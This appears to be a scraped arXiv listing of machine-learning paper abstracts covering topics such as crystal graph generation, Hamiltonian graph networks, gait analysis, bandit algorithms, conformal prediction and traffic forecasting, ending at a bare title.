    Graph neural networks are widely used in machine learning applied to chemistry, and in particular for material science discovery. For crystalline materials, however, generating graph-based representation from geometrical information for neural networks is not a trivial task. The periodicity of crystalline needs efficient implementations to be processed in real-time under a massively parallel environment. With the aim of training graph-based generative models of new material discovery, we propose an efficient tool to generate cutoff graphs and k-nearest-neighbours graphs of periodic structures within GPU optimization. We provide pyMatGraph a Pytorch-compatible framework to generate graphs in real-time during the training of neural network architecture. Our tool can update a graph of a structure, making generative models able to update the geometry and process the updated graph during the forward propagation on the GPU side. Our code is publicly available at https://github.com/aklipf/mat-graph.  ( 2 min )
    Discovering Symbolic Laws Directly from Trajectories with Hamiltonian Graph Neural Networks. (arXiv:2307.05299v1 [cs.LG])
    The time evolution of physical systems is described by differential equations, which depend on abstract quantities like energy and force. Traditionally, these quantities are derived as functionals based on observables such as positions and velocities. Discovering these governing symbolic laws is the key to comprehending the interactions in nature. Here, we present a Hamiltonian graph neural network (HGNN), a physics-enforced GNN that learns the dynamics of systems directly from their trajectory. We demonstrate the performance of HGNN on n-springs, n-pendulums, gravitational systems, and binary Lennard Jones systems; HGNN learns the dynamics in excellent agreement with the ground truth from small amounts of data. We also evaluate the ability of HGNN to generalize to larger system sizes, and to hybrid spring-pendulum system that is a combination of two original systems (spring and pendulum) on which the models are trained independently. Finally, employing symbolic regression on the learned HGNN, we infer the underlying equations relating the energy functionals, even for complex systems such as the binary Lennard-Jones liquid. Our framework facilitates the interpretable discovery of interaction laws directly from physical system trajectories. Furthermore, this approach can be extended to other systems with topology-dependent dynamics, such as cells, polydisperse gels, or deformable bodies.  ( 2 min )
    Automated Detection of Gait Events and Travel Distance Using Waist-worn Accelerometers Across a Typical Range of Walking and Running Speeds. (arXiv:2307.04866v1 [eess.SP])
    Background: Estimation of temporospatial clinical features of gait (CFs), such as step count and length, step duration, step frequency, gait speed and distance traveled is an important component of community-based mobility evaluation using wearable accelerometers. However, challenges arising from device complexity and availability, cost and analytical methodology have limited widespread application of such tools. Research Question: Can accelerometer data from commercially-available smartphones be used to extract gait CFs across a broad range of attainable gait velocities in children with Duchenne muscular dystrophy (DMD) and typically developing controls (TDs) using machine learning (ML)-based methods Methods: Fifteen children with DMD and 15 TDs underwent supervised clinical testing across a range of gait speeds using 10 or 25m run/walk (10MRW, 25MRW), 100m run/walk (100MRW), 6-minute walk (6MWT) and free-walk (FW) evaluations while wearing a mobile phone-based accelerometer at the waist near the body's center of mass. Gait CFs were extracted from the accelerometer data using a multi-step machine learning-based process and results were compared to ground-truth observation data. Results: Model predictions vs. observed values for step counts, distance traveled, and step length showed a strong correlation (Pearson's r = -0.9929 to 0.9986, p<0.0001). The estimates demonstrated a mean (SD) percentage error of 1.49% (7.04%) for step counts, 1.18% (9.91%) for distance traveled, and 0.37% (7.52%) for step length compared to ground truth observations for the combined 6MWT, 100MRW, and FW tasks. Significance: The study findings indicate that a single accelerometer placed near the body's center of mass can accurately measure CFs across different gait speeds in both TD and DMD peers, suggesting that there is potential for accurately measuring CFs in the community with consumer-level smartphones.  ( 3 min )
    Articulated 3D Head Avatar Generation using Text-to-Image Diffusion Models. (arXiv:2307.04859v1 [cs.CV])
    The ability to generate diverse 3D articulated head avatars is vital to a plethora of applications, including augmented reality, cinematography, and education. Recent work on text-guided 3D object generation has shown great promise in addressing these needs. These methods directly leverage pre-trained 2D text-to-image diffusion models to generate 3D-multi-view-consistent radiance fields of generic objects. However, due to the lack of geometry and texture priors, these methods have limited control over the generated 3D objects, making it difficult to operate inside a specific domain, e.g., human heads. In this work, we develop a new approach to text-guided 3D head avatar generation to address this limitation. Our framework directly operates on the geometry and texture of an articulable 3D morphable model (3DMM) of a head, and introduces novel optimization procedures to update the geometry and texture while keeping the 2D and 3D facial features aligned. The result is a 3D head avatar that is consistent with the text description and can be readily articulated using the deformation model of the 3DMM. We show that our diffusion-based articulated head avatars outperform state-of-the-art approaches for this task. The latter are typically based on CLIP, which is known to provide limited diversity of generation and accuracy for 3D object generation.  ( 2 min )
    Realising Synthetic Active Inference Agents, Part II: Variational Message Updates. (arXiv:2306.02733v2 [stat.ML] UPDATED)
    The Free Energy Principle (FEP) describes (biological) agents as minimising a variational Free Energy (FE) with respect to a generative model of their environment. Active Inference (AIF) is a corollary of the FEP that describes how agents explore and exploit their environment by minimising an expected FE objective. In two related papers, we describe a scalable, epistemic approach to synthetic AIF agents, by message passing on free-form Forney-style Factor Graphs (FFGs). A companion paper (part I) introduces a Constrained FFG (CFFG) notation that visually represents (generalised) FE objectives for AIF. The current paper (part II) derives message passing algorithms that minimise (generalised) FE objectives on a CFFG by variational calculus. A comparison between simulated Bethe and generalised FE agents illustrates how synthetic AIF induces epistemic behaviour on a T-maze navigation task. With a full message passing account of synthetic AIF agents, it becomes possible to derive and reuse message updates across models and move closer to industrial applications of synthetic AIF.  ( 2 min )
    DyCL: Dynamic Neural Network Compilation Via Program Rewriting and Graph Optimization. (arXiv:2307.04963v1 [cs.CL])
    DL compiler's primary function is to translate DNN programs written in high-level DL frameworks such as PyTorch and TensorFlow into portable executables. These executables can then be flexibly executed by the deployed host programs. However, existing DL compilers rely on a tracing mechanism, which involves feeding a runtime input to a neural network program and tracing the program execution paths to generate the computational graph necessary for compilation. Unfortunately, this mechanism falls short when dealing with modern dynamic neural networks (DyNNs) that possess varying computational graphs depending on the inputs. Consequently, conventional DL compilers struggle to accurately compile DyNNs into executable code. To address this limitation, we propose \tool, a general approach that enables any existing DL compiler to successfully compile DyNNs. \tool tackles the dynamic nature of DyNNs by introducing a compilation mechanism that redistributes the control and data flow of the original DNN programs during the compilation process. Specifically, \tool develops program analysis and program transformation techniques to convert a dynamic neural network into multiple sub-neural networks. Each sub-neural network is devoid of conditional statements and is compiled independently. Furthermore, \tool synthesizes a host module that models the control flow of the DyNNs and facilitates the invocation of the sub-neural networks. Our evaluation demonstrates the effectiveness of \tool, achieving a 100\% success rate in compiling all dynamic neural networks. Moreover, the compiled executables generated by \tool exhibit significantly improved performance, running between $1.12\times$ and $20.21\times$ faster than the original DyNNs executed on general-purpose DL frameworks.  ( 3 min )
    Perturbed-History Exploration in Stochastic Linear Bandits. (arXiv:1903.09132v2 [cs.LG] UPDATED)
    We propose a new online algorithm for cumulative regret minimization in a stochastic linear bandit. The algorithm pulls the arm with the highest estimated reward in a linear model trained on its perturbed history. Therefore, we call it perturbed-history exploration in a linear bandit (LinPHE). The perturbed history is a mixture of observed rewards and randomly generated i.i.d. pseudo-rewards. We derive a $\tilde{O}(d \sqrt{n})$ gap-free bound on the $n$-round regret of LinPHE, where $d$ is the number of features. The key steps in our analysis are new concentration and anti-concentration bounds on the weighted sum of Bernoulli random variables. To show the generality of our design, we generalize LinPHE to a logistic model. We evaluate our algorithms empirically and show that they are practical.  ( 2 min )
    Test-Time Training on Video Streams. (arXiv:2307.05014v1 [cs.CV])
    Prior work has established test-time training (TTT) as a general framework to further improve a trained model at test time. Before making a prediction on each test instance, the model is trained on the same instance using a self-supervised task, such as image reconstruction with masked autoencoders. We extend TTT to the streaming setting, where multiple test instances - video frames in our case - arrive in temporal order. Our extension is online TTT: The current model is initialized from the previous model, then trained on the current frame and a small window of frames immediately before. Online TTT significantly outperforms the fixed-model baseline for four tasks, on three real-world datasets. The relative improvement is 45% and 66% for instance and panoptic segmentation. Surprisingly, online TTT also outperforms its offline variant that accesses more information, training on all frames from the entire test video regardless of temporal order. This differs from previous findings using synthetic videos. We conceptualize locality as the advantage of online over offline TTT. We analyze the role of locality with ablations and a theory based on bias-variance trade-off.  ( 2 min )
    Accelerated Discovery of Machine-Learned Symmetries: Deriving the Exceptional Lie Groups G2, F4 and E6. (arXiv:2307.04891v1 [hep-th])
    Recent work has applied supervised deep learning to derive continuous symmetry transformations that preserve the data labels and to obtain the corresponding algebras of symmetry generators. This letter introduces two improved algorithms that significantly speed up the discovery of these symmetry transformations. The new methods are demonstrated by deriving the complete set of generators for the unitary groups U(n) and the exceptional Lie groups $G_2$, $F_4$, and $E_6$. A third post-processing algorithm renders the found generators in sparse form. We benchmark the performance improvement of the new algorithms relative to the standard approach. Given the significant complexity of the exceptional Lie groups, our results demonstrate that this machine-learning method for discovering symmetries is completely general and can be applied to a wide variety of labeled datasets.  ( 2 min )
    Monotone deep Boltzmann machines. (arXiv:2307.04990v1 [cs.LG])
    Deep Boltzmann machines (DBMs), one of the first ``deep'' learning methods ever studied, are multi-layered probabilistic models governed by a pairwise energy function that describes the likelihood of all variables/nodes in the network. In practice, DBMs are often constrained, i.e., via the \emph{restricted} Boltzmann machine (RBM) architecture (which does not permit intra-layer connections), in order to allow for more efficient inference. In this work, we revisit the generic DBM approach, and ask the question: are there other possible restrictions to their design that would enable efficient (approximate) inference? In particular, we develop a new class of restricted model, the monotone DBM, which allows for arbitrary self-connection in each layer, but restricts the \emph{weights} in a manner that guarantees the existence and global uniqueness of a mean-field fixed point. To do this, we leverage tools from the recently-proposed monotone Deep Equilibrium model and show that a particular choice of activation results in a fixed-point iteration that gives a variational mean-field solution. While this approach is still largely conceptual, it is the first architecture that allows for efficient approximate inference in fully-general weight structures for DBMs. We apply this approach to simple deep convolutional Boltzmann architectures and demonstrate that it allows for tasks such as the joint completion and classification of images, within a single deep probabilistic setting, while avoiding the pitfalls of mean-field inference in traditional RBMs.  ( 2 min )
    Human Emotion Recognition Based On Galvanic Skin Response signal Feature Selection and SVM. (arXiv:2307.05383v1 [eess.SP])
    A novel human emotion recognition method based on automatically selected Galvanic Skin Response (GSR) signal features and SVM is proposed in this paper. GSR signals were acquired by e-Health Sensor Platform V2.0. Then, the data is de-noised by wavelet function and normalized to get rid of the individual difference. 30 features are extracted from the normalized data, however, directly using of these features will lead to a low recognition rate. In order to gain the optimized features, a covariance based feature selection is employed in our method. Finally, a SVM with input of the optimized features is utilized to achieve the human emotion recognition. The experimental results indicate that the proposed method leads to good human emotion recognition, and the recognition accuracy is more than 66.67%.  ( 2 min )
    A physics-constrained machine learning method for mapping gapless land surface temperature. (arXiv:2307.04817v1 [physics.ao-ph])
    More accurate, spatio-temporally, and physically consistent LST estimation has been a main interest in Earth system research. Developing physics-driven mechanism models and data-driven machine learning (ML) models are two major paradigms for gapless LST estimation, which have their respective advantages and disadvantages. In this paper, a physics-constrained ML model, which combines the strengths in the mechanism model and ML model, is proposed to generate gapless LST with physical meanings and high accuracy. The hybrid model employs ML as the primary architecture, under which the input variable physical constraints are incorporated to enhance the interpretability and extrapolation ability of the model. Specifically, the light gradient-boosting machine (LGBM) model, which uses only remote sensing data as input, serves as the pure ML model. Physical constraints (PCs) are coupled by further incorporating key Community Land Model (CLM) forcing data (cause) and CLM simulation data (effect) as inputs into the LGBM model. This integration forms the PC-LGBM model, which incorporates surface energy balance (SEB) constraints underlying the data in CLM-LST modeling within a biophysical framework. Compared with a pure physical method and pure ML methods, the PC-LGBM model improves the prediction accuracy and physical interpretability of LST. It also demonstrates a good extrapolation ability for the responses to extreme weather cases, suggesting that the PC-LGBM model enables not only empirical learning from data but also rationally derived from theory. The proposed method represents an innovative way to map accurate and physically interpretable gapless LST, and could provide insights to accelerate knowledge discovery in land surface processes and data mining in geographical parameter estimation.  ( 3 min )
    Predicting Outcomes in Long COVID Patients with Spatiotemporal Attention. (arXiv:2307.04770v1 [cs.LG])
    Long COVID is a general term of post-acute sequelae of COVID-19. Patients with long COVID can endure long-lasting symptoms including fatigue, headache, dyspnea and anosmia, etc. Identifying the cohorts with severe long-term complications in COVID-19 could benefit the treatment planning and resource arrangement. However, due to the heterogeneous phenotype presented in long COVID patients, it is difficult to predict their outcomes from their longitudinal data. In this study, we proposed a spatiotemporal attention mechanism to weigh feature importance jointly from the temporal dimension and feature space. Considering that medical examinations can have interchangeable orders in adjacent time points, we restricted the learning of short-term dependency with a Local-LSTM and the learning of long-term dependency with the joint spatiotemporal attention. We also compared the proposed method with several state-of-the-art methods and a method in clinical practice. The methods are evaluated on a hard-to-acquire clinical dataset of patients with long COVID. Experimental results show the Local-LSTM with joint spatiotemporal attention outperformed related methods in outcome prediction. The proposed method provides a clinical tool for the severity assessment of long COVID.  ( 2 min )
    Collaborative Score Distillation for Consistent Visual Synthesis. (arXiv:2307.04787v1 [cs.CV])
    Generative priors of large-scale text-to-image diffusion models enable a wide range of new generation and editing applications on diverse visual modalities. However, when adapting these priors to complex visual modalities, often represented as multiple images (e.g., video), achieving consistency across a set of images is challenging. In this paper, we address this challenge with a novel method, Collaborative Score Distillation (CSD). CSD is based on the Stein Variational Gradient Descent (SVGD). Specifically, we propose to consider multiple samples as "particles" in the SVGD update and combine their score functions to distill generative priors over a set of images synchronously. Thus, CSD facilitates seamless integration of information across 2D images, leading to a consistent visual synthesis across multiple samples. We show the effectiveness of CSD in a variety of tasks, encompassing the visual editing of panorama images, videos, and 3D scenes. Our results underline the competency of CSD as a versatile method for enhancing inter-sample consistency, thereby broadening the applicability of text-to-image diffusion models.  ( 2 min )
    On Detecting Some Defective Items in Group Testing. (arXiv:2307.04822v1 [cs.DS])
    Group testing is an approach aimed at identifying up to $d$ defective items among a total of $n$ elements. This is accomplished by examining subsets to determine if at least one defective item is present. In our study, we focus on the problem of identifying a subset of $\ell\leq d$ defective items. We develop upper and lower bounds on the number of tests required to detect $\ell$ defective items in both the adaptive and non-adaptive settings while considering scenarios where no prior knowledge of $d$ is available, and situations where an estimate of $d$ or at least some non-trivial upper bound on $d$ is available. When no prior knowledge on $d$ is available, we prove a lower bound of $ \Omega(\frac{\ell \log^2n}{\log \ell +\log\log n})$ tests in the randomized non-adaptive settings and an upper bound of $O(\ell \log^2 n)$ for the same settings. Furthermore, we demonstrate that any non-adaptive deterministic algorithm must ask $\Theta(n)$ tests, signifying a fundamental limitation in this scenario. For adaptive algorithms, we establish tight bounds in different scenarios. In the deterministic case, we prove a tight bound of $\Theta(\ell\log{(n/\ell)})$. Moreover, in the randomized settings, we derive a tight bound of $\Theta(\ell\log{(n/d)})$. When $d$, or at least some non-trivial estimate of $d$, is known, we prove a tight bound of $\Theta(d\log (n/d))$ for the deterministic non-adaptive settings, and $\Theta(\ell\log(n/d))$ for the randomized non-adaptive settings. In the adaptive case, we present an upper bound of $O(\ell \log (n/\ell))$ for the deterministic settings, and a lower bound of $\Omega(\ell\log(n/d)+\log n)$. Additionally, we establish a tight bound of $\Theta(\ell \log(n/d))$ for the randomized adaptive settings.  ( 3 min )
    Comparison of Point Cloud and Image-based Models for Calorimeter Fast Simulation. (arXiv:2307.04780v1 [cs.LG])
    Score based generative models are a new class of generative models that have been shown to accurately generate high dimensional calorimeter datasets. Recent advances in generative models have used images with 3D voxels to represent and model complex calorimeter showers. Point clouds, however, are likely a more natural representation of calorimeter showers, particularly in calorimeters with high granularity. Point clouds preserve all of the information of the original simulation, more naturally deal with sparse datasets, and can be implemented with more compact models and data files. In this work, two state-of-the-art score based models are trained on the same set of calorimeter simulation and directly compared.  ( 2 min )
    Formulating A Strategic Plan Based On Statistical Analyses And Applications For Financial Companies Through A Real-World Use Case. (arXiv:2307.04778v1 [cs.LG])
    Business statistics play a crucial role in implementing a data-driven strategic plan at the enterprise level to employ various analytics where the outcomes of such a plan enable an enterprise to enhance the decision-making process or to mitigate risks to the organization. In this work, a strategic plan informed by the statistical analysis is introduced for a financial company called LendingClub, where the plan is comprised of exploring the possibility of onboarding a big data platform along with advanced feature selection capacities. The main objectives of such a plan are to increase the company's revenue while reducing the risks of granting loans to borrowers who cannot return their loans. In this study, different hypotheses formulated to address the company's concerns are studied, where the results reveal that the amount of loans profoundly impacts the number of borrowers charging off their loans. Also, the proposed strategic plan includes onboarding advanced analytics such as machine learning technologies that allow the company to build better generalized data-driven predictive models.  ( 2 min )
    MentalHealthAI: Utilizing Personal Health Device Data to Optimize Psychiatry Treatment. (arXiv:2307.04777v1 [cs.LG])
    Mental health disorders remain a significant challenge in modern healthcare, with diagnosis and treatment often relying on subjective patient descriptions and past medical history. To address this issue, we propose a personalized mental health tracking and mood prediction system that utilizes patient physiological data collected through personal health devices. Our system leverages a decentralized learning mechanism that combines transfer and federated machine learning concepts using smart contracts, allowing data to remain on users' devices and enabling effective tracking of mental health conditions for psychiatric treatment and management in a privacy-aware and accountable manner. We evaluate our model using a popular mental health dataset that demonstrates promising results. By utilizing connected health systems and machine learning models, our approach offers a novel solution to the challenge of providing psychiatrists with further insight into their patients' mental health outside of traditional office visits.  ( 2 min )
    Digital Twins for Patient Care via Knowledge Graphs and Closed-Form Continuous-Time Liquid Neural Networks. (arXiv:2307.04772v1 [cs.LG])
    Digital twin technology has is anticipated to transform healthcare, enabling personalized medicines and support, earlier diagnoses, simulated treatment outcomes, and optimized surgical plans. Digital twins are readily gaining traction in industries like manufacturing, supply chain logistics, and civil infrastructure. Not in patient care, however. The challenge of modeling complex diseases with multimodal patient data and the computational complexities of analyzing it have stifled digital twin adoption in the biomedical vertical. Yet, these major obstacles can potentially be handled by approaching these models in a different way. This paper proposes a novel framework for addressing the barriers to clinical twin modeling created by computational costs and modeling complexities. We propose structuring patient health data as a knowledge graph and using closed-form continuous-time liquid neural networks, for real-time analytics. By synthesizing multimodal patient data and leveraging the flexibility and efficiency of closed form continuous time networks and knowledge graph ontologies, our approach enables real time insights, personalized medicine, early diagnosis and intervention, and optimal surgical planning. This novel approach provides a comprehensive and adaptable view of patient health along with real-time analytics, paving the way for digital twin simulations and other anticipated benefits in healthcare.  ( 2 min )
  • Open

    Optimal Algorithms for Latent Bandits with Cluster Structure. (arXiv:2301.07040v3 [cs.LG] UPDATED)
    We consider the problem of latent bandits with cluster structure where there are multiple users, each with an associated multi-armed bandit problem. These users are grouped into \emph{latent} clusters such that the mean reward vectors of users within the same cluster are identical. At each round, a user, selected uniformly at random, pulls an arm and observes a corresponding noisy reward. The goal of the users is to maximize their cumulative rewards. This problem is central to practical recommendation systems and has received wide attention of late \cite{gentile2014online, maillard2014latent}. Now, if each user acts independently, then they would have to explore each arm independently and a regret of $\Omega(\sqrt{\mathsf{MNT}})$ is unavoidable, where $\mathsf{M}, \mathsf{N}$ are the number of arms and users, respectively. Instead, we propose LATTICE (Latent bAndiTs via maTrIx ComplEtion) which allows exploitation of the latent cluster structure to provide the minimax optimal regret of $\widetilde{O}(\sqrt{(\mathsf{M}+\mathsf{N})\mathsf{T}})$, when the number of clusters is $\widetilde{O}(1)$. This is the first algorithm to guarantee such strong regret bound. LATTICE is based on a careful exploitation of arm information within a cluster while simultaneously clustering users. Furthermore, it is computationally efficient and requires only $O(\log{\mathsf{T}})$ calls to an offline matrix completion oracle across all $\mathsf{T}$ rounds.
    Conformalization of Sparse Generalized Linear Models. (arXiv:2307.05109v1 [cs.LG])
    Given a sequence of observable variables $\{(x_1, y_1), \ldots, (x_n, y_n)\}$, the conformal prediction method estimates a confidence set for $y_{n+1}$ given $x_{n+1}$ that is valid for any finite sample size by merely assuming that the joint distribution of the data is permutation invariant. Although attractive, computing such a set is computationally infeasible in most regression problems. Indeed, in these cases, the unknown variable $y_{n+1}$ can take an infinite number of possible candidate values, and generating conformal sets requires retraining a predictive model for each candidate. In this paper, we focus on a sparse linear model with only a subset of variables for prediction and use numerical continuation techniques to approximate the solution path efficiently. The critical property we exploit is that the set of selected variables is invariant under a small perturbation of the input data. Therefore, it is sufficient to enumerate and refit the model only at the change points of the set of active features and smoothly interpolate the rest of the solution via a Predictor-Corrector mechanism. We show how our path-following algorithm accurately approximates conformal prediction sets and illustrate its performance using synthetic and real data examples.
    Differentially Private Statistical Inference through $\beta$-Divergence One Posterior Sampling. (arXiv:2307.05194v1 [stat.ML])
    Differential privacy guarantees allow the results of a statistical analysis involving sensitive data to be released without compromising the privacy of any individual taking part. Achieving such guarantees generally requires the injection of noise, either directly into parameter estimates or into the estimation process. Instead of artificially introducing perturbations, sampling from Bayesian posterior distributions has been shown to be a special case of the exponential mechanism, producing consistent, and efficient private estimates without altering the data generative process. The application of current approaches has, however, been limited by their strong bounding assumptions which do not hold for basic models, such as simple linear regressors. To ameliorate this, we propose $\beta$D-Bayes, a posterior sampling scheme from a generalised posterior targeting the minimisation of the $\beta$-divergence between the model and the data generating process. This provides private estimation that is generally applicable without requiring changes to the underlying model and consistently learns the data generating parameter. We show that $\beta$D-Bayes produces more precise inference estimation for the same privacy guarantees, and further facilitates differentially private estimation via posterior sampling for complex classifiers and continuous regression models such as neural networks for the first time.
    Hybrid hidden Markov LSTM for short-term traffic flow prediction. (arXiv:2307.04954v1 [cs.LG])
    Deep learning (DL) methods have outperformed parametric models such as historical average, ARIMA and variants in predicting traffic variables into short and near-short future, that are critical for traffic management. Specifically, recurrent neural network (RNN) and its variants (e.g. long short-term memory) are designed to retain long-term temporal correlations and therefore are suitable for modeling sequences. However, multi-regime models assume the traffic system to evolve through multiple states (say, free-flow, congestion in traffic) with distinct characteristics, and hence, separate models are trained to characterize the traffic dynamics within each regime. For instance, Markov-switching models with a hidden Markov model (HMM) for regime identification is capable of capturing complex dynamic patterns and non-stationarity. Interestingly, both HMM and LSTM can be used for modeling an observation sequence from a set of latent or, hidden state variables. In LSTM, the latent variable is computed in a deterministic manner from the current observation and the previous latent variable, while, in HMM, the set of latent variables is a Markov chain. Inspired by research in natural language processing, a hybrid hidden Markov-LSTM model that is capable of learning complementary features in traffic data is proposed for traffic flow prediction. Results indicate significant performance gains in using hybrid architecture compared to conventional methods such as Markov switching ARIMA and LSTM.
    Diagnosing Model Performance Under Distribution Shift. (arXiv:2303.02011v4 [stat.ML] UPDATED)
    Prediction models can perform poorly when deployed to target distributions different from the training distribution. To understand these operational failure modes, we develop a method, called DIstribution Shift DEcomposition (DISDE), to attribute a drop in performance to different types of distribution shifts. Our approach decomposes the performance drop into terms for 1) an increase in harder but frequently seen examples from training, 2) changes in the relationship between features and outcomes, and 3) poor performance on examples infrequent or unseen during training. These terms are defined by fixing a distribution on $X$ while varying the conditional distribution of $Y \mid X$ between training and target, or by fixing the conditional distribution of $Y \mid X$ while varying the distribution on $X$. In order to do this, we define a hypothetical distribution on $X$ consisting of values common in both training and target, over which it is easy to compare $Y \mid X$ and thus predictive performance. We estimate performance on this hypothetical distribution via reweighting methods. Empirically, we show how our method can 1) inform potential modeling improvements across distribution shifts for employment prediction on tabular census data, and 2) help to explain why certain domain adaptation methods fail to improve model performance for satellite image classification.
    MAP- and MLE-Based Teaching. (arXiv:2307.05252v1 [cs.LG])
    Imagine a learner L who tries to infer a hidden concept from a collection of observations. Building on the work [4] of Ferri et al., we assume the learner to be parameterized by priors P(c) and by c-conditional likelihoods P(z|c) where c ranges over all concepts in a given class C and z ranges over all observations in an observation set Z. L is called a MAP-learner (resp. an MLE-learner) if it thinks of a collection S of observations as a random sample and returns the concept with the maximum a-posteriori probability (resp. the concept which maximizes the c-conditional likelihood of S). Depending on whether L assumes that S is obtained from ordered or unordered sampling resp. from sampling with or without replacement, we can distinguish four different sampling modes. Given a target concept c in C, a teacher for a MAP-learner L aims at finding a smallest collection of observations that causes L to return c. This approach leads in a natural manner to various notions of a MAP- or MLE-teaching dimension of a concept class C. Our main results are: We show that this teaching model has some desirable monotonicity properties. We clarify how the four sampling modes are related to each other. As for the (important!) special case, where concepts are subsets of a domain and observations are 0,1-labeled examples, we obtain some additional results. First of all, we characterize the MAP- and MLE-teaching dimension associated with an optimally parameterized MAP-learner graph-theoretically. From this central result, some other ones are easy to derive. It is shown, for instance, that the MLE-teaching dimension is either equal to the MAP-teaching dimension or exceeds the latter by 1. It is shown furthermore that these dimensions can be bounded from above by the so-called antichain number, the VC-dimension and related combinatorial parameters. Moreover they can be computed in polynomial time.
    Normalized mutual information is a biased measure for classification and community detection. (arXiv:2307.01282v1 [cs.SI] CROSS LISTED)
    Normalized mutual information is widely used as a similarity measure for evaluating the performance of clustering and classification algorithms. In this paper, we show that results returned by the normalized mutual information are biased for two reasons: first, because they ignore the information content of the contingency table and, second, because their symmetric normalization introduces spurious dependence on algorithm output. We introduce a modified version of the mutual information that remedies both of these shortcomings. As a practical demonstration of the importance of using an unbiased measure, we perform extensive numerical tests on a basket of popular algorithms for network community detection and show that one's conclusions about which algorithm is best are significantly affected by the biases in the traditional mutual information.
    Robust Inference of Manifold Density and Geometry by Doubly Stochastic Scaling. (arXiv:2209.08004v2 [math.ST] UPDATED)
    The Gaussian kernel and its traditional normalizations (e.g., row-stochastic) are popular approaches for assessing similarities between data points. Yet, they can be inaccurate under high-dimensional noise, especially if the noise magnitude varies considerably across the data, e.g., under heteroskedasticity or outliers. In this work, we investigate a more robust alternative -- the doubly stochastic normalization of the Gaussian kernel. We consider a setting where points are sampled from an unknown density on a low-dimensional manifold embedded in high-dimensional space and corrupted by possibly strong, non-identically distributed, sub-Gaussian noise. We establish that the doubly stochastic affinity matrix and its scaling factors concentrate around certain population forms, and provide corresponding finite-sample probabilistic error bounds. We then utilize these results to develop several tools for robust inference under general high-dimensional noise. First, we derive a robust density estimator that reliably infers the underlying sampling density and can substantially outperform the standard kernel density estimator under heteroskedasticity and outliers. Second, we obtain estimators for the pointwise noise magnitudes, the pointwise signal magnitudes, and the pairwise Euclidean distances between clean data points. Lastly, we derive robust graph Laplacian normalizations that accurately approximate various manifold Laplacians, including the Laplace Beltrami operator, improving over traditional normalizations in noisy settings. We exemplify our results in simulations and on real single-cell RNA-sequencing data. For the latter, we show that in contrast to traditional methods, our approach is robust to variability in technical noise levels across cell types.
    Selective Sampling and Imitation Learning via Online Regression. (arXiv:2307.04998v1 [cs.LG])
    We consider the problem of Imitation Learning (IL) by actively querying noisy expert for feedback. While imitation learning has been empirically successful, much of prior work assumes access to noiseless expert feedback which is not practical in many applications. In fact, when one only has access to noisy expert feedback, algorithms that rely on purely offline data (non-interactive IL) can be shown to need a prohibitively large number of samples to be successful. In contrast, in this work, we provide an interactive algorithm for IL that uses selective sampling to actively query the noisy expert for feedback. Our contributions are twofold: First, we provide a new selective sampling algorithm that works with general function classes and multiple actions, and obtains the best-known bounds for the regret and the number of queries. Next, we extend this analysis to the problem of IL with noisy expert feedback and provide a new IL algorithm that makes limited queries. Our algorithm for selective sampling leverages function approximation, and relies on an online regression oracle w.r.t.~the given model class to predict actions, and to decide whether to query the expert for its label. On the theoretical side, the regret bound of our algorithm is upper bounded by the regret of the online regression oracle, while the query complexity additionally depends on the eluder dimension of the model class. We complement this with a lower bound that demonstrates that our results are tight. We extend our selective sampling algorithm for IL with general function approximation and provide bounds on both the regret and the number of queries made to the noisy expert. A key novelty here is that our regret and query complexity bounds only depend on the number of times the optimal policy (and not the noisy expert, or the learner) go to states that have a small margin.
    The Statistical Complexity of Interactive Decision Making. (arXiv:2112.13487v3 [cs.LG] UPDATED)
    A fundamental challenge in interactive learning and decision making, ranging from bandit problems to reinforcement learning, is to provide sample-efficient, adaptive learning algorithms that achieve near-optimal regret. This question is analogous to the classical problem of optimal (supervised) statistical learning, where there are well-known complexity measures (e.g., VC dimension and Rademacher complexity) that govern the statistical complexity of learning. However, characterizing the statistical complexity of interactive learning is substantially more challenging due to the adaptive nature of the problem. The main result of this work provides a complexity measure, the Decision-Estimation Coefficient, that is proven to be both necessary and sufficient for sample-efficient interactive learning. In particular, we provide: 1. a lower bound on the optimal regret for any interactive decision making problem, establishing the Decision-Estimation Coefficient as a fundamental limit. 2. a unified algorithm design principle, Estimation-to-Decisions (E2D), which transforms any algorithm for supervised estimation into an online algorithm for decision making. E2D attains a regret bound that matches our lower bound up to dependence on a notion of estimation performance, thereby achieving optimal sample-efficient learning as characterized by the Decision-Estimation Coefficient. Taken together, these results constitute a theory of learnability for interactive decision making. When applied to reinforcement learning settings, the Decision-Estimation Coefficient recovers essentially all existing hardness results and lower bounds. More broadly, the approach can be viewed as a decision-theoretic analogue of the classical Le Cam theory of statistical estimation; it also unifies a number of existing approaches -- both Bayesian and frequentist.
    Realising Synthetic Active Inference Agents, Part II: Variational Message Updates. (arXiv:2306.02733v2 [stat.ML] UPDATED)
    The Free Energy Principle (FEP) describes (biological) agents as minimising a variational Free Energy (FE) with respect to a generative model of their environment. Active Inference (AIF) is a corollary of the FEP that describes how agents explore and exploit their environment by minimising an expected FE objective. In two related papers, we describe a scalable, epistemic approach to synthetic AIF agents, by message passing on free-form Forney-style Factor Graphs (FFGs). A companion paper (part I) introduces a Constrained FFG (CFFG) notation that visually represents (generalised) FE objectives for AIF. The current paper (part II) derives message passing algorithms that minimise (generalised) FE objectives on a CFFG by variational calculus. A comparison between simulated Bethe and generalised FE agents illustrates how synthetic AIF induces epistemic behaviour on a T-maze navigation task. With a full message passing account of synthetic AIF agents, it becomes possible to derive and reuse message updates across models and move closer to industrial applications of synthetic AIF.
    Randomized Exploration in Generalized Linear Bandits. (arXiv:1906.08947v3 [cs.LG] UPDATED)
    We study two randomized algorithms for generalized linear bandits. The first, GLM-TSL, samples a generalized linear model (GLM) from the Laplace approximation to the posterior distribution. The second, GLM-FPL, fits a GLM to a randomly perturbed history of past rewards. We analyze both algorithms and derive $\tilde{O}(d \sqrt{n \log K})$ upper bounds on their $n$-round regret, where $d$ is the number of features and $K$ is the number of arms. The former improves on prior work while the latter is the first for Gaussian noise perturbations in non-linear models. We empirically evaluate both GLM-TSL and GLM-FPL in logistic bandits, and apply GLM-FPL to neural network bandits. Our work showcases the role of randomization, beyond posterior sampling, in exploration.
    Tracking Most Significant Shifts in Nonparametric Contextual Bandits. (arXiv:2307.05341v1 [stat.ML])
